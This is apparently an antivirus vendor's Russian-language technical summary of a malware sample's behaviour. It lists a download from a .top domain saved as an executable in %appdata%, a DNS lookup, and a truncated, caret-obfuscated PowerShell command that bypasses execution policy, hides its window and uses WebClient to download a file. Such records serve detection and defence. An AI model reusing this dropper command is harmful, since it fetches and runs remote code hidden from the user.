Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERs^He^Ll^.e^Xe -e^x^EcUTIoNP^oL^ICY^ B^y^paS^S^ -NoPRofILe -W^I^ND^O^WST^YL^E ^hiDD^En (ne^w^-O^bj^E^c^T SYS^TeM^.N^Et.W^e^B^cliEn^T^).DO^WNLOA^D^f^ILe(^'http://www.zoerpo...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POwERs^He^Ll^.e^Xe -e^x^EcUTIoNP^oL^ICY^ B^y^paS^S^ -NoPRofILe -W^I^ND^O^WST^YL^E ^hiDD^En (ne^w^-O^bj^E^c^T SYS^TeM^.N^Et.W^e^B^cliEn^T^).DO^WNLOA^D^f^ILe(^'http://www.zoerpo...' (со скрытым окном)